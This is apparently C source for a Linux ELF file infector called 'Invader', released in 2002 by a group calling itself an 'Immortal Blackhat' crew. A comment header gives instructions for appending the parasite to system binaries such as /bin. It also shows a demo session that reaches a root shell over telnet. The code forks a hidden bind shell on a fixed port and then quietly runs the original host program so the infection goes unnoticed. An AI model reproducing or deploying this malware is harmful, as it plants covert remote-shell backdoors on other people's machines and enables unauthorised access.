/* ----------------------------------------------------------- [CONFIDENTIAL SOURCE MATERIAL OF THE ELECTRONIC-SOULS CREW] ------------------- DO NOT DISTRIBUTE ! ------------------- ----------------------------------------------------------- [ E l e c t r o n i c S o u l s ] [Invader] - append ELF infect0r - update of the underworld ELF Parasite (C) BrainStorm - 01-2002 ----------------------------------------------------------- Information : +++++++++++++ This ELF Infector uses the appendage infection tekneeq! that means to two Executeables are appended together. The payload inside this parasite opens a port shell on the infected machine as the user who executed it. ----------------------------------------------------------- to get it working : +++++++++++++++++++ compile the code, then get the file size and change the define in the code, now recompile and we are done ;) example : i wrote a quick program that just prints a msg and shows the date so i can test the infection: [root@BrainMachine x]# ./blah im a test prog that gets infected :> Sam Jan 5 14:22:43 CET 2002 [root@BrainMachine x]# thats how it looks like before the infection and after it, since the parasite extracts the host to a temp file and executes it, so you wont notice the infection unless you added some printf()s from another term: [root@BrainMachine client]# telnet localhost 21317 Trying 127.0.0.1... Connected to brainmachine.electronicsouls.org. Escape character is '^]'. uname -a; Linux BrainMachine.ElectronicSouls.org 2.2.17-14 #1 Wed Feb 14 13:51:00 CET 2001 i686 unknown : command not found id; uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) : command not found ..now ph34r this ;) ----------------------------------------------------------- to infect a binary : ++++++++++++++++++++ cat /bin/binary >> para: mv para /bin/binary if binary gets executed it opens up a portshell ;) ----------------------------------------------------------- special thanks to : +++++++++++++++++++ ghQst and SectorX for making me interested in ELF infection and for beeing there for me since back in the days =) ! and PhaNtoM for providing me with that very small portshell code ! shouts go out to all ElectronicSouls members - j00 r0ck =) ----------------------------------------------------------- [ElectronicSouls] - Immortal Blackhat since 1995 ;) ----------------------------------------------------------- */ /* the fearsome t e k n e e q z start here ! */ #include #include #include #include #include #include #include #define PARASIZE 18018 /* dont forget to change me ! */ #define TEMP ".para.tmp" /* tmp file */ #define KILL(X) exit(1) /* we dont want to die.. */ int soc,cli; struct sockaddr_in serv_addr; int main(int argc, char *argv[], char *envp[]) { int input, output, lenght; char *dope; struct stat stat; if(fork()==0) /* start of the portshell */ { serv_addr.sin_family=2; serv_addr.sin_addr.s_addr=0; serv_addr.sin_port=(0x4553); soc=socket(2,1,6); bind(soc,(struct sockaddr *)&serv_addr,0x10); listen(soc,1); cli=accept(soc,0,0); dup2(cli,0); dup2(cli,1); dup2(cli,2); execl("/bin/sh","sh",0); } input = open("/proc/self/exe", O_RDONLY); if (input < 0) KILL("open(input)"); if (fstat(input, &stat) < 0) KILL("fstat"); lenght = stat.st_size - PARASIZE; dope = malloc(lenght); if (dope == NULL) KILL("malloc"); if (lseek(input, PARASIZE, SEEK_SET) != PARASIZE) KILL("lseek(input)"); if (read(input, dope, lenght) != lenght) KILL("read(input)"); close(input); output = open(TEMP, O_RDWR | O_CREAT | O_TRUNC, stat.st_mode); if (output < 0) KILL("open(output)"); if (write(output, dope, lenght) != lenght) KILL("write(output)"); free(dope); close(output); exit(execve(TEMP, argv, envp)); }